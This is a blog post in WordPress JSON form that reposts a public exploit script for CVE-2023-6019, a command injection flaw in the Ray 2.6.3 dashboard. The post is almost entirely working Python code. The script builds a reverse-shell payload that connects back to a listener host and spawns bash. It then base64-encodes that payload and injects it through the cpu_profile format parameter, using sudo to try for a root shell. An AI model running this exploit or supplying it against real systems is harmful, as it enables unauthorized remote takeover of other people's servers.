{"id":56235,"date":"2024-04-12T19:29:51","date_gmt":"2024-04-12T15:29:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178034\/rayos263-exec.txt"},"modified":"2024-04-12T19:29:51","modified_gmt":"2024-04-12T15:29:51","slug":"ray-os-2-6-3-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ray-os-2-6-3-command-injection\/","title":{"rendered":"Ray OS 2.6.3 Command Injection"},"content":{"rendered":"

# Exploit Title: Ray OS v2.6.3 – Command Injection RCE(Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https:\/\/www.ray.io\/
# Software Link: https:\/\/github.com\/ray-project\/ray
# CVE: CVE-2023-6019
# Refer: https:\/\/huntr.com\/bounties\/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================<\/p>\n

# !usr\/bin\/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3<\/p>\n

proxies = {“http”: “127.0.0.1:8080”}
headers = {
“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64; rv:91.0) Gecko\/20100101 Firefox\/91.0”
}<\/p>\n

def check_url(target, port):
target_url = target + “:” + port
https = 0
if ‘http’ not in target:
try:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
test_url = ‘http:\/\/’ + target_url
response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
if response.status_code != 200:
is_https = 0
return is_https
except Exception as e:
print(“ERROR! The Exception is:” + format(e))
if https == 1:
return “https:\/\/” + target_url
else:
return “http:\/\/” + target_url<\/p>\n

def exp(target,ip,lhost, lport):
payload = ‘python3 -c \\’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“‘ + lhost + ‘”,’ + lport + ‘));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“\/bin\/bash”)\\”
print(“[*]Payload is: ” + payload)
b64_payload = base64.b64encode(payload.encode())
print(“[*]Base64 encoding payload is: ” + b64_payload.decode())
exp_url = target + ‘\/worker\/cpu_profile?pid=3354&ip=’ + str(ip) + ‘&duration=5&native=0&format=`echo ‘ + b64_payload.decode() + ‘ |base64$IFS-d|sudo%20sh`’
# response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
print(exp_url)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url=exp_url, headers=headers, verify=False)
if response.status_code == 200:
print(“[-]ERROR: Exploit Failed,please check the payload.”)
else:
print(“[+]Exploit is finished,please check your machine!”)<\/p>\n

if __name__ == ‘__main__’:
parser = argparse.ArgumentParser(
description=”’
\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840
\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804
\u2860\u2804\u2844\u2844\u2860\u2840\u28c0\u2840\u2892\u2804\u2854\u2844\u2892\u2804\u2892\u2804\u28c0\u2840\u28d6\u2842\u2854\u2844\u28b4\u2804\u28d6\u2846\u2804\u2804\u2864\u2840\u2844\u2844
\u2811\u2802\u2818\u2804\u2819\u2802\u2804\u2804\u2813\u2802\u2811\u2801\u2813\u2802\u2812\u2801\u2804\u2804\u2813\u2803\u2811\u2801\u281a\u2802\u2812\u2803\u2810\u2804\u2817\u2801\u282c\u2803<\/p>\n

\u28b0\u28f1\u28a0\u28a0\u2820\u2866\u28b8\u2884\u2880\u2884\u28a0\u2860\u2804\u2804\u28b8\u280d\u2820\u2845\u28a0\u2860\u2880\u2884\u2804\u2804\u28b8\u28f8\u2880\u2884\u2808\u2847\u2820\u286f\u2804
\u2818\u2818\u2808\u281a\u2804\u2813\u2818\u2818\u2808\u280a\u2818\u2804\u2804\u2801\u2818\u2804\u2810\u2813\u2818\u2804\u2808\u2813\u2820\u2824\u2818\u2819\u2808\u280a\u2810\u2813\u2804\u2803\u2804
\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840\u28c0\u2840
\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804
”’,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(‘-t’, ‘–target’, type=str, required=True, help=’tart ip’)
parser.add_argument(‘-p’, ‘–port’, type=str, default=80, required=False, help=’tart host port’)
parser.add_argument(‘-L’, ‘–lhost’, type=str, required=True, help=’listening host ip’)
parser.add_argument(‘-P’, ‘–lport’, type=str, default=80, required=False, help=’listening port’)
args = parser.parse_args()
# target = args.target
ip = args.target
# port = args.port
# lhost = args.lhost
# lport = args.lport
targeturl = check_url(args.target, args.port)
print(targeturl)
print(“[*] Checking in url: ” + targeturl)
exp(targeturl, ip, args.lhost, args.lport)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Ray OS v2.6.3 – Command Injection RCE(Unauthorized)# Description:# The Ray Project dashboard contains a CPU profiling page, and the format parameter is# not validated before being inserted into a system command executed in a shell, allowing# for arbitrary command execution. If the system is configured to allow passwordless sudo# (a setup some …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56235","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56235"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56235\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}